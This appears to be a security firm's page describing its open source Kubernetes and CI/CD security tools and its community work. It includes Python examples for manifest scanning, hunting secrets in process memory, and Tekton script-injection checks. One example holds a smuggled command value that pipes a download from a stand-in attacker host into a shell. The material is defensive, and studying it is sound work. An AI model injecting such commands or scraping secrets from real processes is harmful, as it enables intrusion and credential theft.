Open Source, Community, and Presentations

Open Source

Our Red and Blue Team open source

kubesec

https://github.com/controlplaneio/kubesec

Security risk analysis for Kubernetes resources. Identifies misconfigurations in Pods, Deployments, and other resources and generates recommendations to improve their security. Used to find insecure configurations, harden security contexts, and learn Kubernetes Pod security. Available as a command line tool, a free API, a kubectl plugin that scans resources already running in the cluster, and a GitHub Action for CI/CD pipelines, listed on the GitHub and GitLab marketplaces.

netassert

https://github.com/controlplaneio/netassert

Network security testing for DevSecOps workflows: a framework for fast, safe iteration on firewall, routing, and NACL rules for Kubernetes (Network Policies, Services) and non-containerised hosts (cloud provider instances, VMs, bare metal). It aggressively parallelises nmap to test outbound connections and ports from any accessible host, container, or Kubernetes Pod by joining the network namespace of the instance under test.

Simulator

https://github.com/controlplaneio/simulator

Kubernetes production breach simulation. Used to provision ControlPlane CTFs, and the official CTF engine for every KubeCon since 2019. Provisions full, production-like infrastructure for attacking and debugging Kubernetes: creates a private Kubernetes cluster for each player, runs scenarios that demonstrate compromise paths and vulnerabilities, and trains defenders to mitigate them.

BadRobot

https://github.com/controlplaneio/badrobot

Security analysis for Kubernetes Operators. Analyses YAML manifests before they are deployed to detect high-risk configurations, and prevents a compromised Operator from taking over a cluster through loose RBAC. See the KubeCon EU 2022 talk on BadRobot and Operator security.
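The kubesec and BadRobot entries above both describe static analysis of Kubernetes manifests: the first scores Pod security contexts, the second looks for RBAC that would let a compromised Operator escalate. The script below is an added example written for this page, not code from either project: it implements a small, hypothetical rule set of that kind (rule ids, score deltas and the sample manifests are all invented here) over manifests held as Python dicts, which is what `yaml.safe_load` returns for a YAML file. An insecure Pod is scored beside its hardened form, and a wildcard Operator ClusterRole beside a scoped one.

```python
"""Static risk checks over Kubernetes manifests in the spirit of kubesec (Pod
security contexts) and BadRobot (Operator RBAC). Added example for this page:
rule ids, score deltas and sample manifests are hypothetical, not the tools'
own rule sets. Manifests are dicts, as yaml.safe_load would return them."""
from typing import Any

Finding = tuple[str, int, str]  # (rule id, score delta, message)
READ_VERBS = {"get", "list", "watch", "*"}
WORKLOADS = {"Deployment", "StatefulSet", "DaemonSet", "Job"}


def scan_pod(pod: dict[str, Any]) -> list[Finding]:
    """Flag Pod settings that widen the blast radius of a container compromise."""
    findings: list[Finding] = []
    spec = pod.get("spec", {})
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key):
            findings.append((key, -30, f"spec.{key}: shares a host namespace"))
    pod_sc = spec.get("securityContext", {})
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name = c.get("name", "<unnamed>")
        sc = {**pod_sc, **c.get("securityContext", {})}  # container level wins
        if sc.get("privileged"):
            findings.append(("privileged", -50, f"{name}: privileged container"))
        if sc.get("allowPrivilegeEscalation", True):  # Kubernetes default is true
            findings.append(("allowPrivilegeEscalation", -10,
                             f"{name}: allowPrivilegeEscalation is not false"))
        if not sc.get("runAsNonRoot"):
            findings.append(("runAsNonRoot", -10, f"{name}: may run as UID 0"))
        if not sc.get("readOnlyRootFilesystem"):
            findings.append(("readOnlyRootFilesystem", -5, f"{name}: writable rootfs"))
        caps = sc.get("capabilities", {})
        if "ALL" not in caps.get("drop", []):
            findings.append(("capabilities.drop", -5, f"{name}: does not drop ALL"))
        for cap in caps.get("add", []):
            findings.append((f"capabilities.add.{cap}", -20, f"{name}: adds {cap}"))
    return findings


def scan_role(role: dict[str, Any]) -> list[Finding]:
    """Flag (Cluster)Role rules that let a compromised Operator escalate."""
    findings: list[Finding] = []
    for i, rule in enumerate(role.get("rules", [])):
        verbs, resources = set(rule.get("verbs", [])), set(rule.get("resources", []))
        where = f"rules[{i}]"
        if "*" in verbs and "*" in resources:
            findings.append(("rbac.wildcard", -50, f"{where}: '*' on '*' is cluster-admin"))
            continue
        if "*" in verbs or "*" in resources:
            findings.append(("rbac.partial-wildcard", -20, f"{where}: wildcard verbs or resources"))
        if "secrets" in resources and verbs & READ_VERBS:
            findings.append(("rbac.secrets", -30, f"{where}: can read Secrets"))
        if escalating := verbs & {"bind", "escalate", "impersonate"}:
            findings.append(("rbac.escalate", -40, f"{where}: {sorted(escalating)} escalate"))
        if "pods/exec" in resources and verbs & {"create", "*"}:
            findings.append(("rbac.exec", -30, f"{where}: can exec into Pods"))
    return findings


def scan(manifest: dict[str, Any]) -> list[Finding]:
    """Dispatch on kind; kinds without rules yield no findings."""
    kind = manifest.get("kind", "")
    if kind == "Pod":
        return scan_pod(manifest)
    if kind in WORKLOADS:  # the PodTemplateSpec carries its own .spec
        return scan_pod(manifest.get("spec", {}).get("template", {}))
    if kind in ("Role", "ClusterRole"):
        return scan_role(manifest)
    return []


def score(findings: list[Finding]) -> int:
    """Lower is worse; 0 means nothing was flagged. Weights are illustrative."""
    return sum(delta for _, delta, _ in findings)


# Constructed sample manifests (hypothetical names and images).
INSECURE_POD = {"kind": "Pod", "metadata": {"name": "debug"}, "spec": {
    "hostPID": True, "containers": [{"name": "shell", "image": "busybox",
        "securityContext": {"privileged": True, "capabilities": {"add": ["SYS_ADMIN"]}}}]}}
HARDENED_POD = {"kind": "Pod", "metadata": {"name": "debug"}, "spec": {
    "securityContext": {"runAsNonRoot": True},
    "containers": [{"name": "shell", "image": "busybox", "securityContext": {
        "allowPrivilegeEscalation": False, "readOnlyRootFilesystem": True,
        "capabilities": {"drop": ["ALL"]}}}]}}
OPERATOR_CLUSTERROLE = {"kind": "ClusterRole", "metadata": {"name": "widget-operator"},
    "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
SCOPED_CLUSTERROLE = {"kind": "ClusterRole", "metadata": {"name": "widget-operator"},
    "rules": [{"apiGroups": ["example.com"], "resources": ["widgets"],
               "verbs": ["get", "list", "watch", "update"]},
              {"apiGroups": ["apps"], "resources": ["deployments"],
               "verbs": ["create", "get", "list", "watch", "update", "patch"]}]}

if __name__ == "__main__":
    for m in (INSECURE_POD, HARDENED_POD, OPERATOR_CLUSTERROLE, SCOPED_CLUSTERROLE):
        found = scan(m)
        print(f"{m['kind']}/{m['metadata']['name']}: score {score(found)}")
        for rule, delta, msg in found:
            print(f"  {delta:>4} {rule}: {msg}")
```

Pod-level and container-level `securityContext` are merged before checking, with the container winning, which mirrors how the kubelet resolves fields such as `runAsNonRoot`. Workload kinds are unwrapped to their Pod template so a Deployment is judged by the same rules as a bare Pod.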

truffleproc

https://github.com/controlplaneio/truffleproc

Hunt secrets in a process's memory. A mashup of TruffleHog and gdb: it reads a target application's memory and reports discovered secrets and high-entropy strings. Useful for adversarial emulation, penetration testing, and testing defence-in-depth controls.
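To show what "high-entropy strings" in memory means in practice, the following is an added example written for this page, not truffleproc's own code. It reimplements the two detector styles such a tool relies on, a known-format pattern (the documented AWS access key id shape) and a Shannon-entropy threshold over printable token runs, and runs them over a constructed byte buffer standing in for a memory dump, so it works offline. The `read_process_memory()` function shows the live-process path on Linux through `/proc/<pid>/maps` and `/proc/<pid>/mem`; it needs ptrace rights over the target and is not exercised by the sample run.

```python
"""Hunt secrets in a byte buffer the way a process-memory scanner does.
Added example for this page, not truffleproc's code: truffleproc dumps a live
process with gdb and hands the dump to TruffleHog's detectors; this script
reimplements two detector styles (a known-format pattern and a Shannon-entropy
threshold) over a constructed "memory" buffer so it runs offline.
read_process_memory() shows the live-process path; it needs ptrace rights
(same UID with a permissive kernel.yama.ptrace_scope, or root)."""
import math
import re

# Runs of token characters at least 20 long; NULs and binary bytes split them.
CANDIDATE = re.compile(rb"[A-Za-z0-9+/_\-]{20,}")
# Known-format detector: AWS access key ids start with AKIA plus 16 chars.
PATTERNS = {"aws-access-key-id": re.compile(rb"AKIA[0-9A-Z]{16}")}
ENTROPY_THRESHOLD = 4.0  # bits/symbol; random base64 ~5-6, English words ~3-4


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution (0.0 for empty or one-symbol input)."""
    if not data:
        return 0.0
    n = len(data)
    counts: dict[int, int] = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def hunt(buf: bytes, threshold: float = ENTROPY_THRESHOLD) -> list[dict]:
    """Return every pattern hit and high-entropy token with its offset in buf."""
    hits = []
    for kind, pat in PATTERNS.items():
        for m in pat.finditer(buf):
            hits.append({"kind": kind, "offset": m.start(), "value": m.group().decode("ascii")})
    for m in CANDIDATE.finditer(buf):
        e = shannon_entropy(m.group())
        if e >= threshold:
            hits.append({"kind": "high-entropy", "offset": m.start(),
                         "value": m.group().decode("ascii"), "entropy": round(e, 2)})
    return sorted(hits, key=lambda h: h["offset"])


def read_process_memory(pid: int) -> bytes:
    """Concatenate every readable mapping of a live Linux process (not run here)."""
    chunks = []
    with open(f"/proc/{pid}/maps") as maps, open(f"/proc/{pid}/mem", "rb", 0) as mem:
        for line in maps:
            fields = line.split()
            start, end = (int(x, 16) for x in fields[0].split("-"))
            path = fields[5] if len(fields) > 5 else ""
            if "r" not in fields[1] or path in ("[vvar]", "[vsyscall]"):
                continue  # unreadable, or kernel regions that return EIO
            try:
                mem.seek(start)
                chunks.append(mem.read(end - start))
            except (OSError, OverflowError):
                continue  # mapping vanished or could not be read mid-scan
    return b"".join(chunks)


# Constructed "memory": a fake binary header, UI strings, low-entropy padding,
# a long English-like identifier, a random credential and an example AWS key.
SECRET = "Zq7mX2vLp9RwK4tN8bYc3HdJ6gFs1Ae5"  # 32 distinct chars: entropy exactly 5.0
AWS_KEY = "AKIAIOSFODNN7EXAMPLE"               # AWS's documented example key id
MEMORY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"Welcome to the admin console\x00"
    + b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00"
    + b"internal_service_account_token_refresher\x00"
    + b"DB_PASSWORD=" + SECRET.encode() + b"\x00"
    + b"AWS_ACCESS_KEY_ID=" + AWS_KEY.encode() + b"\x00"
    + bytes(range(0, 256, 3))  # arbitrary binary, no long printable runs
)

if __name__ == "__main__":
    for h in hunt(MEMORY):
        print(f"0x{h['offset']:06x} {h['kind']:<18} {h['value']}")
```

Note what each detector catches: the random password scores 5.0 bits and is found by entropy alone, while the AWS key id, whose letters repeat, scores about 3.7 and is caught only by the format pattern. Lowering the threshold to 3.5 pulls the key in by entropy but also flags the long identifier, which is the usual trade-off when tuning a memory hunt.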

TaskCheck

https://github.com/controlplaneio/taskcheck

Detect security issues in Tekton Tasks. Static analysis that detects vulnerable Task configurations and blocks insecure CI/CD pipelines, with best-practice checks to prevent secrets leakage, code injection, and build-stage bypass.
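The three classes of issue named above map onto concrete Task fields. The script below is an added example for this page, not TaskCheck's own rules or output: it implements one hypothetical check for each class over a Task held as a dict (the `yaml.safe_load` form), and then applies Tekton's textual `$(params.<name>)` substitution to a vulnerable step and its hardened counterpart to show why a parameter referenced inside `script` is a shell injection while the same parameter passed through `env` is not. The Task names, images and hostile parameter value are constructed.

```python
"""Static checks over a Tekton Task of the kind TaskCheck describes. Added
example for this page, not TaskCheck's rules: rule names and sample Tasks are
constructed. Tasks are dicts, as yaml.safe_load would return them."""
import re
from typing import Any

# Tekton replaces $(params.<name>) textually before a step runs, so a param
# that reaches a script body is spliced straight into the shell source.
PARAM_REF = re.compile(r"\$\(params\.([A-Za-z0-9_\-]+)\)")
# set -x / set -o xtrace echo expanded commands, secrets included, to the log.
XTRACE = re.compile(r"set\s+(-[a-zA-Z]*x[a-zA-Z]*|-o\s+xtrace)")


def check_task(task: dict[str, Any]) -> list[tuple[str, str, str]]:
    """Return (rule, step name, detail) findings for one Task."""
    findings = []
    for step in task.get("spec", {}).get("steps", []):
        name = step.get("name", "<unnamed>")
        script = step.get("script") or ""
        for p in PARAM_REF.findall(script):
            findings.append(("script-injection", name,
                             f"$(params.{p}) is interpolated into script; pass it via env or args"))
        if XTRACE.search(script):
            findings.append(("secret-leak", name, "shell tracing logs expanded secret values"))
        if step.get("onError") == "continue":
            findings.append(("stage-bypass", name, "onError: continue hides a failing gate step"))
    return findings


def render(step: dict[str, Any], params: dict[str, str]) -> dict[str, Any]:
    """Apply Tekton-style param substitution to a step's script and env values."""
    def sub(text: str) -> str:
        return PARAM_REF.sub(lambda m: params.get(m.group(1), m.group(0)), text)
    out = dict(step)
    if "script" in step:
        out["script"] = sub(step["script"])
    out["env"] = [{**e, "value": sub(e.get("value", ""))} for e in step.get("env", [])]
    return out


# Constructed sample Tasks; image names are placeholders.
VULNERABLE_TASK = {"apiVersion": "tekton.dev/v1", "kind": "Task",
    "metadata": {"name": "clone-and-scan"}, "spec": {
        "params": [{"name": "repo-url", "type": "string"}],
        "steps": [
            {"name": "clone", "image": "example.com/git:1",
             "script": "#!/bin/sh\nset -ex\ngit clone $(params.repo-url) /workspace/src\n"},
            {"name": "scan", "image": "example.com/scanner:1", "onError": "continue",
             "script": "#!/bin/sh\nscanner fs /workspace/src\n"}]}}
HARDENED_TASK = {"apiVersion": "tekton.dev/v1", "kind": "Task",
    "metadata": {"name": "clone-and-scan"}, "spec": {
        "params": [{"name": "repo-url", "type": "string"}],
        "steps": [
            {"name": "clone", "image": "example.com/git:1",
             "env": [{"name": "REPO_URL", "value": "$(params.repo-url)"}],
             "script": "#!/bin/sh\nset -e\ngit clone \"$REPO_URL\" /workspace/src\n"},
            {"name": "scan", "image": "example.com/scanner:1",
             "script": "#!/bin/sh\nscanner fs /workspace/src\n"}]}}
HOSTILE = {"repo-url": "https://example.com/repo.git; curl https://attacker.example/x | sh"}

if __name__ == "__main__":
    for task in (VULNERABLE_TASK, HARDENED_TASK):
        print(task["metadata"]["name"], check_task(task) or "clean")
        print(render(task["spec"]["steps"][0], HOSTILE)["script"])
```

In the rendered vulnerable step the hostile value becomes part of the shell source, so the `curl ... | sh` after the `;` runs as its own command. In the hardened step substitution only changes the `env` value; the script still reads `"$REPO_URL"`, so `git` receives the whole string as one argument and fails to clone rather than executing anything.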

Tekton Chains Storage Forwarder

https://github.com/controlplaneio/chains-storage-forwarder

An OCI storage shim for Tekton Tasks provenance. Buffers attestation and verification metadata in MongoDB before forwarding it to OCI storage, as the default provider does, backfilling functionality not yet supported in Tekton Chains.

Community

Security leadership and collaboration

Security Technical Advisory Group, The Linux Foundation (CNCF)

TAG Security is a community-run effort covering access control, policy, privacy, auditing, and explainability in cloud native security. It sits under the Linux Foundation's Cloud Native Computing Foundation (CNCF), home of Kubernetes, Prometheus, and containerd (the runtime underneath Docker), with a combined project market cap of $18.9T. The TAG is responsible for threat modelling and assuring cloud native technologies contributed to the CNCF, and for assisting maintainers with security work.

ControlPlane CEO Andrew Martin is a co-chair, and Head of Security Rowan Baker is a long-term contributor, including to the Supply Chain Security and Cloud Security whitepapers.

OpenUK

OpenUK is a charity dedicated to the advancement of open source in the United Kingdom with a focus on its security, legal ramifications, and the community.

ControlPlane CEO Andrew Martin serves as the charity's pro bono CISO, advising the public and private sectors and advocating on the group's behalf. His personal mission is to facilitate the fair remuneration of open source maintainers, enabling them to prioritise security remediation and ensuring the safe adoption of open source.

OpenSSF (Linux Foundation)

The Open Source Security Foundation implements community-wide, industry-supported security initiatives to protect open source software development and delivery.

FINOS (Linux Foundation)

The Fintech Open Source Foundation assists in open source adoption, infrastructure code reuse, and community collaboration for financial services organisations.

ControlPlane contributes to multiple working groups (including the FINOS Common Cloud Controls), conferences, and meetups.

Local Community Meetups

We run:

  • Service Mesh London with Tetrate
  • DevSecCon London with Snyk
  • Threat Modelling London
  • and any other meetup we can help with!

Presentations

Our ethos is open source security: sharing with the community and learning, in public, to secure the next generation of technology.

Publications

Our contributions to books, whitepapers, and training courses.

Media

Interviews and panels across the years.